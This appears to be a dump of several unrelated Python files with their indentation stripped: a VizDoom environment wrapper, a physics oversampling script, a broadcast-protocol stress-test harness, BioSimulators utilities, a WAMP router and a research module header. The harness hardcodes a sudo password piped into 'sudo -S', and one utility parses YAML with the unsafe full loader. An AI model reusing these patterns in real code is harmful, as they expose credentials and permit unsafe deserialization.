@retry_dm(exception_class=Exception, num_attempts=3, sleep_time=1, should_reset=True)
def step(self, actions):
self._ensure_initialized()
for frame in range(self.skip_frames - 1):
self.await_tasks(actions, TaskType.STEP)
obs, rew, dones, infos = self.await_tasks(actions, TaskType.STEP_UPDATE)
for info in infos:
info['num_frames'] = self.skip_frames
if all(dones):
obs = self.await_tasks(None, TaskType.RESET, timeout=2.0)[0]
if self.enable_rendering:
self.last_obs = obs
return obs, rew, dones, infos
# noinspection PyUnusedLocal
def render(self, *args, **kwargs):
self.enable_rendering = True
if self.last_obs is None:
return
render_multiagent = True
if render_multiagent:
obs_display = [o['obs'] for o in self.last_obs]
obs_grid = concat_grid(obs_display)
cv2.imshow('vizdoom', obs_grid)
else:
obs_display = self.last_obs[0]['obs']
cv2.imshow('vizdoom', cvt_doom_obs(obs_display))
cv2.waitKey(1)
def close(self):
if self.workers is not None:
# log.info('Stopping multiagent env %d...', self.env_config.worker_index)
for worker in self.workers:
worker.task_queue.put((None, TaskType.TERMINATE))
time.sleep(0.1)
for worker in self.workers:
worker.process.join()
def seed(self, seed=None):
"""Does not really make sense for the wrapper. Individual envs will be uniquely seeded on init."""
pass
def set_env_attr(self, agent_idx, attr_chain, value):
data = (agent_idx, attr_chain, value)
worker = self.workers[agent_idx]
worker.task_queue.put((data, TaskType.SET_ATTR))
result = safe_get(worker.result_queue, timeout=0.1)
assert result is None
|
run_oversampled_afterburner.py
|
import csv
import os
import sys
from multiprocessing import Process, current_process
import datetime as dt
import time
print("### Starting afterburner oversampling routine ###")
start_time = time.time()
# stop spawning sampling/afterburner events when
# the total number of hadrons summed over all samples
# is greater than some lower bound
min_num_particles = int(sys.argv[1])
print("Minimum number of total particles : " + str(min_num_particles))
#number particles sampled in first set
num_particles_sampled = 0
#number of cores reading the same freezeout surface
num_cores = int(sys.argv[2])
print("Cores available : " + str(num_cores) )
def spawn_afterburner(sample):
#print('{}: hello from {}'.format( dt.datetime.now(), current_process().name) )
sample_dir = "sample_" + str(sample)
os.system( 'mkdir ' + sample_dir )
os.chdir( sample_dir )
os.system( 'ln -s ../surface.dat surface.dat' )
os.system( 'ln -s ../SomeAfterburnerExecutable SomeAfterburnerExecutable' )
os.system( './SomeAfterburnerExecutable' )
os.chdir( ".." )
def get_number_particles(sample):
sample_dir = "sample_" + str(sample)
particle_list_file = open(sample_dir + '/final_soft_hadrons.dat', 'rb')
reader = csv.reader(particle_list_file)
#first header line is number of particles in list
num_particles = reader.next()
return int(num_particles[0])
#spawn the first set of jobs
if __name__ == '__main__':
worker_count = num_cores
worker_pool = []
for sample in range(worker_count):
p = Process( target = spawn_afterburner, args = (sample,) )
p.start()
worker_pool.append(p)
for p in worker_pool:
p.join()
#get the number of particles produced in the first set of samples
for sample in range(0, num_cores):
num_particles = get_number_particles(sample)
num_particles_sampled += num_particles
print("Number of particles sampled in first launch : " + str(num_particles_sampled) )
avg_num_per_sample = num_particles_sampled / num_cores
print("Average number of particles per sample : " + str(avg_num_per_sample) )
#get the total number of events we need based on the avg
num_jobs = min_num_particles / avg_num_per_sample + 1
print("Total number of jobs necessary : " + str(num_jobs) )
num_launches = ( num_jobs - 1 ) / num_cores
print("Number of launches necessary to meet minimum : " + str(num_launches) )
for launch in range(1, num_launches + 1):
if __name__ == '__main__':
worker_count = num_cores
worker_pool = []
for core in range(worker_count):
sample = launch * num_cores + core
p = Process( target = spawn_afterburner, args = (sample,) )
p.start()
worker_pool.append(p)
for p in worker_pool:
p.join()
print("Oversampling routine finished in " + str( time.time() - start_time) + " sec")
print("Goodbye!")
|
validate.py
|
#!/usr/bin/env python3
import argparse
import os, atexit
import textwrap
import time
import tempfile
import threading, subprocess
import barrier, finishedSignal
import random
import signal
import random
import time
from enum import Enum
from collections import defaultdict, OrderedDict
BARRIER_IP = "localhost"
BARRIER_PORT = 10000
SIGNAL_IP = "localhost"
SIGNAL_PORT = 11000
PROCESSES_BASE_IP = 11000
# Do not run multiple validations concurrently!
class TC:
def __init__(self, losses, interface="lo", needSudo=True, sudoPassword="dcl"):
self.losses = losses
self.interface = interface
self.needSudo = needSudo
self.sudoPassword = sudoPassword
cmd1 = "tc qdisc add dev {} root netem 2>/dev/null".format(self.interface)
cmd2 = "tc qdisc change dev {} root netem delay {} {} distribution normal loss {} {} reorder {} {}".format(
self.interface,
*self.losses["delay"],
*self.losses["loss"],
*self.losses["reordering"]
)
if self.needSudo:
os.system("echo {} | sudo -S {}".format(self.sudoPassword, cmd1))
os.system("echo {} | sudo -S {}".format(self.sudoPassword, cmd2))
else:
os.system(cmd1)
os.system(cmd2)
atexit.register(self.cleanup)
def __str__(self):
ret = """\
Interface: {}
Distribution: Normal
Delay: {} {}
Loss: {} {}
Reordering: {} {}""".format(
self.interface,
*self.losses["delay"],
*self.losses["loss"],
*self.losses["reordering"]
)
return textwrap.dedent(ret)
def cleanup(self):
cmd = "tc qdisc del dev {} root 2>/dev/null".format(self.interface)
if self.needSudo:
os.system("echo '{}' | sudo -S {}".format(self.sudoPassword, cmd))
else:
os.system(cmd)
class ProcessState(Enum):
RUNNING = 1
STOPPED = 2
TERMINATED = 3
class ProcessInfo:
def __init__(self, handle):
self.lock = threading.Lock()
self.handle = handle
self.state = ProcessState.RUNNING
@staticmethod
def stateToSignal(state):
if state == ProcessState.RUNNING:
return signal.SIGCONT
if state == ProcessState.STOPPED:
return signal.SIGSTOP
if state == ProcessState.TERMINATED:
return signal.SIGTERM
@staticmethod
def stateToSignalStr(state):
if state == ProcessState.RUNNING:
return "SIGCONT"
if state == ProcessState.STOPPED:
return "SIGSTOP"
if state == ProcessState.TERMINATED:
return "SIGTERM"
@staticmethod
def validStateTransition(current, desired):
if current == ProcessState.TERMINATED:
return False
if current == ProcessState.RUNNING:
return desired == ProcessState.STOPPED or desired == ProcessState.TERMINATED
if current == ProcessState.STOPPED:
return desired == ProcessState.RUNNING
return False
class AtomicSaturatedCounter:
def __init__(self, saturation, initial=0):
self._saturation = saturation
self._value = initial
self._lock = threading.Lock()
def reserve(self):
with self._lock:
if self._value < self._saturation:
self._value += 1
return True
else:
return False
class Validation:
def __init__(self, processes, messages, outputDir):
self.processes = processes
self.messages = messages
self.outputDirPath = os.path.abspath(outputDir)
if not os.path.isdir(self.outputDirPath):
raise Exception("`{}` is not a directory".format(self.outputDirPath))
def generateConfig(self):
# Implement on the derived classes
pass
def checkProcess(self, pid):
# Implement on the derived classes
pass
def checkAll(self, continueOnError=True):
ok = True
for pid in range(1, self.processes + 1):
ret = self.checkProcess(pid)
if not ret:
ok = False
if not ret and not continueOnError:
return False
return ok
class FifoBroadcastValidation(Validation):
def generateConfig(self):
hosts = tempfile.NamedTemporaryFile(mode="w")
config = tempfile.NamedTemporaryFile(mode="w")
for i in range(1, self.processes + 1):
hosts.write("{} localhost {}\n".format(i, PROCESSES_BASE_IP + i))
hosts.flush()
config.write("{}\n".format(self.messages))
config.flush()
return (hosts, config)
def checkProcess(self, pid):
filePath = os.path.join(self.outputDirPath, "proc{:02d}.output".format(pid))
i = 1
nextMessage = defaultdict(lambda: 1)
filename = os.path.basename(filePath)
with open(filePath) as f:
for lineNumber, line in enumerate(f):
tokens = line.split()
# Check broadcast
if tokens[0] == "b":
msg = int(tokens[1])
if msg != i:
print(
"File {}, Line {}: Messages broadcast out of order. Expected message {} but broadcast message {}".format(
filename, lineNumber, i, msg
)
)
return False
i += 1
# Check delivery
if tokens[0] == "d":
sender = int(tokens[1])
msg = int(tokens[2])
if msg != nextMessage[sender]:
print(
"File {}, Line {}: Message delivered out of order. Expected message {}, but delivered message {}".format(
filename, lineNumber, nextMessage[sender], msg
)
)
return False
else:
nextMessage[sender] = msg + 1
return True
class LCausalBroadcastValidation(Validation):
def __init__(self, processes, messages, outputDir, extraParameter):
super().__init__(processes, messages, outputDir)
# Use the `extraParameter` to pass any information you think is relevant
def generateConfig(self):
hosts = tempfile.NamedTemporaryFile(mode="w")
config = tempfile.NamedTemporaryFile(mode="w")
# membership file for the validate
membershipFile = open(self.outputDirPath + "/membership", "w")
membershipFile.write("{}\n".format(self.processes))
for i in range(1, self.processes + 1):
hosts.write("{} localhost {}\n".format(i, PROCESSES_BASE_IP + i))
membershipFile.write("{} 0.0.0.0 {}\n".format(i, PROCESSES_BASE_IP + i))
hosts.flush()
config.write("{}\n".format(self.messages))
self.dependencies = [0] * (self.processes + 1)
for i in range(1, self.processes + 1):
config.write("{} ".format(i))
membershipFile.write("{} ".format(i))
n = random.randint(0, self.processes)
list_dep = random.sample(range(1, self.processes + 1), n)
if i in list_dep:
list_dep.remove(i)
self.dependencies[i] = list_dep
config.write("{}\n".format(" ".join([str(x) for x in list_dep])))
membershipFile.write("{}\n".format(" ".join([str(x) for x in list_dep])))
config.flush()
membershipFile.close()
return (hosts, config)
def checkProcess(self, pid):
result = subprocess.run(
["python3", "./test_lcb.py", self.outputDirPath], stdout=subprocess.PIPE
)
correctIncorrect = result.stdout.decode("utf-8").split("\n")[-2]
if correctIncorrect == "CORRECT":
return True
else:
return False
class StressTest:
def __init__(self, procs, concurrency, attempts, attemptsRatio):
self.processes = len(procs)
self.processesInfo = dict()
for (logicalPID, handle) in procs:
self.processesInfo[logicalPID] = ProcessInfo(handle)
self.concurrency = concurrency
self.attempts = attempts
self.attemptsRatio = attemptsRatio
maxTerminatedProcesses = (
self.processes // 2
if self.processes % 2 == 1
else (self.processes - 1) // 2
)
self.terminatedProcs = AtomicSaturatedCounter(maxTerminatedProcesses)
def stress(self):
selectProc = list(range(1, self.processes + 1))
random.shuffle(selectProc)
selectOp = (
[ProcessState.STOPPED] * int(1000 * self.attemptsRatio["STOP"])
+ [ProcessState.RUNNING] * int(1000 * self.attemptsRatio["CONT"])
+ [ProcessState.TERMINATED] * int(1000 * self.attemptsRatio["TERM"])
)
random.shuffle(selectOp)
successfulAttempts = 0
while successfulAttempts < self.attempts:
proc = random.choice(selectProc)
op = random.choice(selectOp)
info = self.processesInfo[proc]
with info.lock:
if ProcessInfo.validStateTransition(info.state, op):
if op == ProcessState.TERMINATED:
reserved = self.terminatedProcs.reserve()
if reserved:
selectProc.remove(proc)
else:
continue
time.sleep(float(random.randint(50, 500)) / 1000.0)
info.handle.send_signal(ProcessInfo.stateToSignal(op))
info.state = op
successfulAttempts += 1
print(
"Sending {} to process {}".format(
ProcessInfo.stateToSignalStr(op), proc
)
)
# if op == ProcessState.TERMINATED and proc not in terminatedProcs:
# if len(terminatedProcs) < maxTerminatedProcesses:
# terminatedProcs.add(proc)
# if len(terminatedProcs) == maxTerminatedProcesses:
# break
def remainingUnterminatedProcesses(self):
remaining = []
for pid, info in self.processesInfo.items():
with info.lock:
if info.state != ProcessState.TERMINATED:
remaining.append(pid)
return None if len(remaining) == 0 else remaining
def terminateAllProcesses(self):
for _, info in self.processesInfo.items():
with info.lock:
if info.state != ProcessState.TERMINATED:
if info.state == ProcessState.STOPPED:
info.handle.send_signal(
ProcessInfo.stateToSignal(ProcessState.RUNNING)
)
info.handle.send_signal(
ProcessInfo.stateToSignal(ProcessState.TERMINATED)
)
return False
def continueStoppedProcesses(self):
for _, info in self.processesInfo.items():
with info.lock:
if info.state != ProcessState.TERMINATED:
if info.state == ProcessState.STOPPED:
info.handle.send_signal(
ProcessInfo.stateToSignal(ProcessState.RUNNING)
)
def run(self):
if self.concurrency > 1:
threads = [
threading.Thread(target=self.stress) for _ in range(self.concurrency)
]
[p.start() for p in threads]
[p.join() for p in threads]
else:
self.stress()
def startProcesses(processes, runscript, hostsFilePath, configFilePath, outputDir):
runscriptPath = os.path.abspath(runscript)
if not os.path.isfile(runscriptPath):
raise Exception("`{}` is not a file".format(runscriptPath))
if os.path.basename(runscriptPath) != "run.sh":
raise Exception("`{}` is not a runscript".format(runscriptPath))
outputDirPath = os.path.abspath(outputDir)
if not os.path.isdir(outputDirPath):
raise Exception("`{}` is not a directory".format(outputDirPath))
baseDir, _ = os.path.split(runscriptPath)
bin_cpp = os.path.join(baseDir, "bin", "da_proc")
bin_java = os.path.join(baseDir, "bin", "da_proc.jar")
if os.path.exists(bin_cpp):
cmd = [bin_cpp]
elif os.path.exists(bin_java):
cmd = ["java", "-jar", bin_java]
else:
raise Exception(
"`{}` could not find a binary to execute. Make sure you build before validating".format(
runscriptPath
)
)
procs = []
for pid in range(1, processes + 1):
cmd_ext = [
"--id",
str(pid),
"--hosts",
hostsFilePath,
"--barrier",
"{}:{}".format(BARRIER_IP, BARRIER_PORT),
"--signal",
"{}:{}".format(SIGNAL_IP, SIGNAL_PORT),
"--output",
os.path.join(outputDirPath, "proc{:02d}.output".format(pid)),
configFilePath,
]
stdoutFd = open(
os.path.join(outputDirPath, "proc{:02d}.stdout".format(pid)), "w"
)
stderrFd = open(
os.path.join(outputDirPath, "proc{:02d}.stderr".format(pid)), "w"
)
procs.append(
(pid, subprocess.Popen(cmd + cmd_ext, stdout=stdoutFd, stderr=stderrFd))
)
return procs
def main(processes, messages, runscript, broadcastType, logsDir, testConfig):
# Set tc for loopback
tc = TC(testConfig["TC"])
print(tc)
# Start the barrier
initBarrier = barrier.Barrier(BARRIER_IP, BARRIER_PORT, processes)
initBarrier.listen()
startTimesFuture = initBarrier.startTimesFuture()
initBarrierThread = threading.Thread(target=initBarrier.wait)
initBarrierThread.start()
# Start the finish signal
finishSignal = finishedSignal.FinishedSignal(SIGNAL_IP, SIGNAL_PORT, processes)
finishSignal.listen()
finishSignalThread = threading.Thread(target=finishSignal.wait)
finishSignalThread.start()
if broadcastType == "fifo":
validation = FifoBroadcastValidation(processes, messages, logsDir)
else:
# Use the last argument (now it's `None` since it's not being use) to
# pass any information that you think is relevant
validation = LCausalBroadcastValidation(processes, messages, logsDir, None)
hostsFile, configFile = validation.generateConfig()
try:
# Start the processes and get their PIDs
procs = startProcesses(
processes, runscript, hostsFile.name, configFile.name, logsDir
)
# Create the stress test
st = StressTest(
procs,
testConfig["ST"]["concurrency"],
testConfig["ST"]["attempts"],
testConfig["ST"]["attemptsDistribution"],
)
for (logicalPID, procHandle) in procs:
print(
"Process with logicalPID {} has PID {}".format(
logicalPID, procHandle.pid
)
)
initBarrierThread.join()
print("All processes have been initialized.")
st.run()
print("StressTest is complete.")
print("Resuming stopped processes.")
st.continueStoppedProcesses()
print("Waiting until all running processes have finished broadcasting.")
finishSignalThread.join()
for pid, startTs in OrderedDict(sorted(startTimesFuture.items())).items():
print(
"Process {} finished broadcasting {} messages in {} ms".format(
pid, messages, finishSignal.endTimestamps()[pid] - startTs
)
)
unterminated = st.remainingUnterminatedProcesses()
if unterminated is not None:
input(
"Hit `Enter` to terminate the remaining processes with logicalPIDs {}.".format(
unterminated
)
)
st.terminateAllProcesses()
mutex = threading.Lock()
def waitForProcess(logicalPID, procHandle, mutex):
procHandle.wait()
with mutex:
print(
"Process {} exited with {}".format(
logicalPID, procHandle.returncode
)
)
# Monitor which processes have exited
monitors = [
threading.Thread(
target=waitForProcess, args=(logicalPID, procHandle, mutex)
)
for (logicalPID, procHandle) in procs
]
[p.start() for p in monitors]
[p.join() for p in monitors]
input("Hit `Enter` to validate the output")
print("Result of validation: {}".format(validation.checkAll()))
finally:
if procs is not None:
for _, p in procs:
p.kill()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"-r", "--runscript", required=True, dest="runscript", help="Path to run.sh",
)
parser.add_argument(
"-b",
"--broadcast",
choices=["fifo", "lcausal"],
required=True,
dest="broadcastType",
help="Which broadcast implementation to test",
)
parser.add_argument(
"-l",
"--logs",
required=True,
dest="logsDir",
help="Directory to store stdout, stderr and outputs generated by the processes",
)
parser.add_argument(
"-p",
"--processes",
required=True,
type=int,
dest="processes",
help="Number of processes that broadcast",
)
parser.add_argument(
"-m",
"--messages",
required=True,
type=int,
dest="messages",
help="Maximum number (because it can crash) of messages that each process can broadcast",
)
results = parser.parse_args()
testConfig = {
# Network configuration using the tc command
"TC": {
"delay": ("200ms", "50ms"),
"loss": ("10%", "25%"),
"reordering": ("25%", "50%"),
},
# StressTest configuration
"ST": {
"concurrency": 8, # How many threads are interferring with the running processes
"attempts": 8, # How many interferring attempts each threads does
"attemptsDistribution": { # Probability with which an interferring thread will
"STOP": 0.48, # select an interferring action (make sure they add up to 1)
"CONT": 0.48,
"TERM": 0.04,
},
},
}
main(
results.processes,
results.messages,
results.runscript,
results.broadcastType,
results.logsDir,
testConfig,
)
|
utils.py
|
from biosimulators_utils.log.data_model import CombineArchiveLog # noqa: F401
from biosimulators_utils.report.data_model import SedDocumentResults # noqa: F401
from ...exceptions import RequestTimeoutException
import functools
import importlib
import multiprocessing
import os
import sys
import time
import types # noqa: F401
import werkzeug.wrappers.response # noqa: F401
import yaml
__all__ = [
'get_simulators',
'get_simulator_specs',
'get_simulator_api',
'get_simulator_metadata',
'use_simulator_api_to_exec_sedml_docs_in_combine_archive',
'exec_in_subprocess',
]
@functools.lru_cache(maxsize=None)
def get_simulators():
""" Get the ids and APIs of the available simulation tools
Returns:
:obj:`list` of :obj:`dict`: list of the id and name of the module which implements the API for
each available simulation tool
"""
with open(os.path.join(os.path.dirname(__file__), 'simulators.yml'), 'r') as file:
return yaml.load(file, Loader=yaml.Loader)
def get_simulator_specs():
""" Get the specifications of the available simulation tools
Returns:
:obj:`werkzeug.wrappers.response.Response`: response which contains a list of
elements encoded in schema ``Simulator``
"""
simulators = []
for sim in get_simulators():
simulators.append(exec_in_subprocess(get_simulator_metadata, sim['id']))
return simulators
def get_simulator_specs_cache_filename():
""" Get the path to cache the specifications of simulation tools
Returns:
:obj:`str`: path to cache the specifications of simulation tools
"""
return os.path.expanduser(os.path.join('~', '.cache', 'simulators.yml'))
def write_simulator_specs_cache(simulators=None, filename=None):
""" Get the specifications of simulations tools and cache them to a file
Args:
simulators (:obj:`werkzeug.wrappers.response.Response`, optional): response which contains a list of
elements encoded in schema ``Simulator``
filename (:obj:`str`, optional): path to cache the specifications of simulation tools
"""
simulators = simulators or get_simulator_specs()
filename = filename or get_simulator_specs_cache_filename()
dirname = os.path.dirname(filename)
if not os.path.dirname(dirname):
os.makedirs(dirname)
with open(filename, 'w') as file:
file.write(yaml.dump(simulators))
def read_simulator_specs_cache(filename=None):
""" Read the specifications of simulations tools from a file
Args:
filename (:obj:`str`, optional): path to read the specifications of simulation tools
Returns:
:obj:`werkzeug.wrappers.response.Response`: response which contains a list of
elements encoded in schema ``Simulator``
"""
filename = filename or get_simulator_specs_cache_filename()
if not os.path.isfile(filename):
write_simulator_specs_cache(filename=filename)
with open(filename, 'r') as file:
return yaml.load(file, Loader=yaml.Loader)
def get_simulator_api(api, reload=False):
""" Get the BioSimulators API for a simulator
Args:
api (:obj:`str`): module which implements the API for the simulator
reload (:obj:`bool`, optional): whether to reload the API
Returns:
:obj:`types.ModuleType`
"""
module = importlib.import_module(api)
if reload:
importlib.reload(module)
return module
def get_simulator_metadata(id):
""" Get metadata about a simulator
Args:
id (:obj:`str`): BioSimulators id of the simulator
Returns:
:obj:`dict`: metadata about the simulator
"""
simulator = next(simulator for simulator in get_simulators() if simulator['id'] == id)
id = simulator['id']
name = simulator['name']
api_module = simulator['api']['module']
api = get_simulator_api(api_module)
version = api.get_simulator_version()
api_version = api.__version__
return {
'_type': 'Simulator',
'id': id,
'name': name,
'version': version,
'api': {
'_type': 'SimulatorApi',
'module': api_module,
'package': simulator['api']['package'],
'version': api_version,
},
'specs': 'https://api.biosimulators.org/simulators/{}/{}'.format(id, version),
}
def use_simulator_api_to_exec_sedml_docs_in_combine_archive(api_name, *args, **kwargs):
""" Execute the SED-ML tasks defined in a COMBINE/OMEX archive and save the outputs
Args:
api (:obj:`str`): module which implements the API for the simulator
*args (:obj:`list`): positional arguments to ``exec_sedml_docs_in_combine_archive``
**kwargs (:obj:`dict`): keyword arguments to ``exec_sedml_docs_in_combine_archive``
Returns:
: obj: `tuple`:
*: obj:`SedDocumentResults`: results
*: obj:`dict` in the ``SimulationRunResults`` schema: log
"""
api = get_simulator_api(api_name)
results, log = api.exec_sedml_docs_in_combine_archive(*args, **kwargs)
if log:
log = log.to_json()
return results, log
class Process(multiprocessing.context.ForkProcess):
""" Fork process which collects the exceptions of its child
Attributes:
_parent_conn (:obj:`multiprocessing.connection.Connection`): connection for the parent
_child_conn (:obj:`multiprocessing.connection.Connection`): connection for the child
_exception (:obj:`Exception` or :obj:`None`): exception, if any, from the process' child
Inspired by https: // stackoverflow.com/questions/19924104/
"""
def __init__(self, *args, **kwargs):
super(multiprocessing.context.ForkProcess, self).__init__(*args, **kwargs)
self._parent_conn, self._child_conn = multiprocessing.Pipe()
self._exception = None
def run(self):
""" Run the process """
try:
super(multiprocessing.context.ForkProcess, self).run()
self._child_conn.send(False)
except Exception as exception:
self._child_conn.send(exception.with_traceback(sys.exc_info()[2]))
@property
def exception(self):
""" Get the exception from process' child, if any
Returns:
:obj:`Exception` or :obj:`None`: exception, if any, from the process' child
"""
if self._parent_conn.poll():
self._exception = self._parent_conn.recv()
return self._exception
def exec_in_subprocess(func, *args, poll_interval=0.01, timeout=None, **kwargs):
""" Execute a function in a fork
Args:
func (:obj:`types.FunctionType`): function
* args (:obj:`list`): list of positional arguments for the function
poll_interval (:obj:`float`, optional): interval to poll the status of the subprocess
timeout (:obj:`float`, optional): maximum execution time in seconds
**kwargs (:obj:`dict`, optional): dictionary of keyword arguments for the function
Returns:
:obj:`object`: result of the function
"""
context_instance = multiprocessing.get_context('fork')
queue = context_instance.Queue()
process = Process(target=subprocess_target, args=[queue, func] + list(args), kwargs=kwargs)
process.start()
start_time = time.time()
while process.exception is None:
time.sleep(poll_interval)
if timeout is not None and (time.time() - start_time) > timeout:
msg = 'Execution did not complete in {} s. Requests are limited to {} s'.format(timeout, timeout)
raise RequestTimeoutException(
title='Request timed out',
instance=TimeoutError(msg),
)
if process.exception:
raise process.exception
results = queue.get()
return results
def subprocess_target(queue, func, *args, **kwargs):
""" Target executer for a subprocess
Args:
queue (:obj:`multiprocessing.queues.Queue`): queue to send the results of the function to
func (:obj:`types.FunctionType`): function to execute
args (:obj:`list`): list of positional arguments for the function
kwargs (:obj:`dict`): dictionary of keyword arguments for the function
"""
result = func(*args, **kwargs)
queue.put(result)
|
registrations.py
|
import threading
from .uri import *
class WAMPRegistrations(object):
def __init__(self):
self.registered = WAMPURIList()
self.subscribed = WAMPURIList()
def register_local(self,uri,callback,options=None):
""" Registers a local function for handling requests.
This is the end function of using the @wamp.register
decorator on a function
"""
registration_id = secure_rand()
reg_uri = WAMPURI(uri,{
'type': 'local',
'callback': callback,
'registration_id': registration_id,
},options)
self.registered.append(reg_uri)
return registration_id
def register_remote(self,uri,client,options=None):
""" Adds a client that's offering to support a particular
callback on a uri
"""
registration_id = secure_rand()
self.registered.append(
WAMPURI(uri,{
'type': 'remote',
'client': client,
'registration_id': registration_id,
},options)
)
return registration_id
def unregister(self,registration_id):
""" Removes a URI as a callback target
"""
self.registered.remove(lambda r: r['registration_id'] == registration_id)
return registration_id
def invoke(self,client,request,callback):
""" Runs the RPC code associated with the URI
"""
uri = request.procedure
args = request.args
kwargs = request.kwargs
handlers = self.registered.match(uri)
if not handlers:
raise Exception('uri does not exist')
# Use the first matched handler
handler = handlers[0]
# We will disclose the identity by default
# FIXME: we want to parallel the autobahn flexibility with
# authorizers in the future
details = {
'procedure': uri,
'progress': 0,
'caller': client.session_id,
'caller_authid': client.auth.get('authid'),
'caller_role': client.auth.get('role'),
'enc_algo': None,
}
if handler['type'] == 'local':
def thread_run():
try:
registration_id = handler['registration_id']
invoke = INVOCATION(
request_id=request.request_id,
registration_id=registration_id,
details=details
)
result = handler['callback'](invoke,*args,**kwargs)
callback(RESULT(
request_id = request.request_id,
details = details,
args = [ result ],
kwargs = {}
))
except Exception as ex:
import traceback
traceback.print_exc()
callback(ERROR(
request_code = WAMP_INVOCATION,
request_id = request.request_id,
details = details,
error = uri,
args = [u'Call failed: {}'.format(ex)],
))
thread_process = threading.Thread(target=thread_run)
thread_process.daemon = True
thread_process.start()
elif handler['type'] == 'remote':
def on_yield(result):
if result == WAMP_YIELD:
callback(RESULT(
request_id = request.request_id,
details = details,
args = result.args,
kwargs = result.kwargs
))
else:
callback(result)
registration_id = handler['registration_id']
handler_client = handler['client']
if handler_client.closed():
self.reap_client(handler_client)
raise Exception('uri does not exist')
handler_client.send_and_await_response(
INVOCATION(
request_id=request.request_id,
registration_id=registration_id,
details=details,
args=args,
kwargs=kwargs
),
on_yield
)
else:
raise Exception('Unknown handler type')
def invoke_local(self,auth,request,callback):
""" Runs the RPC code associated with the URI
"""
uri = request.procedure
args = request.args
kwargs = request.kwargs
handlers = self.registered.match(uri)
if not handlers:
raise Exception('uri does not exist')
# Use the first matched handler
handler = handlers[0]
# We will disclose the identity by default
# FIXME: we want to parallel the autobahn flexibility with
# authorizers in the future
details = {
'procedure': uri,
'progress': 0,
# FIXME: what should the caller be when it's the server?
# The server can really be whatever it wants, so we're currently
# going with session 0?
#'caller': client.session_id,
'caller': 0,
'caller_authid': auth.get('authid'),
'caller_role': auth.get('role'),
'enc_algo': None,
}
if handler['type'] == 'local':
def thread_run():
try:
registration_id = handler['registration_id']
invoke = INVOCATION(
request_id=request.request_id,
registration_id=registration_id,
details=details
)
result = handler['callback'](invoke,*args,**kwargs)
callback(RESULT(
request_id = request.request_id,
details = details,
args = [ result ],
kwargs = {}
))
except Exception as ex:
import traceback
traceback.print_exc()
callback(ERROR(
request_code = WAMP_INVOCATION,
request_id = request.request_id,
details = details,
error = uri,
args = [u'Call failed: {}'.format(ex)],
))
thread_process = threading.Thread(target=thread_run)
thread_process.daemon = True
thread_process.start()
elif handler['type'] == 'remote':
def on_yield(result):
if result == WAMP_YIELD:
callback(RESULT(
request_id = request.request_id,
details = details,
args = result.args,
kwargs = result.kwargs
))
else:
callback(result)
registration_id = handler['registration_id']
handler_client = handler['client']
if handler_client.closed():
self.reap_client(handler_client)
raise Exception('uri does not exist')
handler_client.send_and_await_response(
INVOCATION(
request_id = request.request_id,
registration_id = registration_id,
details = details,
args = args,
kwargs = kwargs
),
on_yield
)
else:
raise Exception('Unknown handler type')
def subscribe_local(self,uri,callback,options=None):
""" Registers a local function to be invoked when the URI
matches a particular pattern
"""
subscription_id = secure_rand()
sub_uri = WAMPURI(uri,{
'subscription_id': subscription_id,
'type': 'local',
'callback': callback,
},options)
self.subscribed.append(sub_uri)
return subscription_id
def subscribe_remote(self,uri,client,options=None):
""" Registers a remote function to be invoked when the URI
matches a particular pattern
"""
subscription_id = secure_rand()
sub_uri = WAMPURI(uri,{
'subscription_id': subscription_id,
'type': 'remote',
'client': client,
},options)
self.subscribed.append(sub_uri)
return subscription_id
def unsubscribe(self,subscription_id):
""" Removes a URI as a subscriber target
"""
self.subscribed.remove(lambda r: r['subscription_id'] == subscription_id)
return subscription_id
def publish(self,request):
""" Send the publication to all subscribers
(If there are any...)
"""
uri = request.topic
publish_id = secure_rand()
details = {
'topic': uri
}
subscribers = self.subscribed.match(uri)
for subscriber in subscribers:
publish_event = EVENT(
subscription_id = subscriber['subscription_id'],
publish_id = publish_id,
args = request.args,
kwargs = request.kwargs,
details = details,
)
if subscriber['type'] == 'local':
subscriber['callback'](publish_event)
elif subscriber['type'] == 'remote':
client = subscriber['client']
if client.closed():
self.reap_client(client)
continue
client.send_message(publish_event)
return publish_id
def reap_client(self,client):
""" Removes a client from all registrations and subcriptions
Usually used when a client disconnects
"""
self.registered.remove(lambda r: r.get('client') == client)
self.subscribed.remove(lambda r: r.get('client') == client)
|
bayesactinteractive.py
|
"""------------------------------------------------------------------------------------------
Bayesian Affect Control Theory
Interactive Example
Author: Jesse Hoey jhoey@cs.uwaterloo.ca http://www.cs.uwaterloo.ca/~jhoey
September 2013
Use for research purposes only.
Please do not re-distribute without written permission from the author
Any commerical uses strictly forbidden.
Code is provided without any guarantees.
Research sponsored by the Natural Sciences and Engineering Council of Canada (NSERC).
use python2.6
see README for details
----------------------------------------------------------------------------------------------"""
from bayesact import *
from bayesactemot import *
import getopt
import sys
import threading
sys.path.append("./gui/")
from cEnum import eTurn
class cBayesactInteractive(object):
def __init__(self, argv, plotter=None):
#NP.set_printoptions(precision=5)
#NP.set_printoptions(suppress=True)
NP.set_printoptions(linewidth=10000)
#-----------------------------------------------------------------------------------------------------------------------------
#user-defined parameters
#-----------------------------------------------------------------------------------------------------------------------------
#agent knowledge of client id:
#0 : nothing
#1 : one of a selection of num_confusers+1 randoms
#2 : exactly - use this to mimic interact
#3 : same as 0 but also agent does not know its own id
self.agent_knowledge=0
# agent gender
self.agent_gender="male"
# client gender
self.client_gender="male"
#possibly set the agent id to be something
self.agent_id="tutor"
#if not in database (including "") then it is a randomly drawn id
#agent_id=""
#can also set the client id here if agent_knowledge = 2 (knows id of client - see above)
#if agent_knowledge is 0 then this is ignored
#client_id = "professor"
self.client_id = "student"
#who goes first?
self.initial_turn="agent"
#how often do we want to see the full id sets learned by the agent
self.get_full_id_rate=10
#do we want to try to mimic interact?
self.mimic_interact=False
#use pomcp for planning (default use heuristic/greedy method)
self.use_pomcp=False
#parameters for pomcp
#number of continuous actions we wish to sample -
#this is user-defined and is an important parameter
#larger numbers mean bigger, slower, more accurate, planning trees
self.numcact=5
#number of discrete (propositional) actions
#this should be set according to the domain, and is 1 for this generic class
#one discrete action really means no choice
self.numdact=1
#observation resolution when building pomcp plan tree
self.obsres=1.0
#action resolution when buildling pomcp plan tree
self.actres=0.1
#timeout used for POMCP
self.timeout=5.0
#-----------------------------------------------------------------------------------------------------------------------------
#these parameters can be tuned, but using caution
#-----------------------------------------------------------------------------------------------------------------------------
#agent's ability to change identities - higher means it will shape-shift more
self.bvagent=0.0001
#agent's belief about the client's ability to change identities - higher means it will shape-shift more
self.bvclient=0.0001
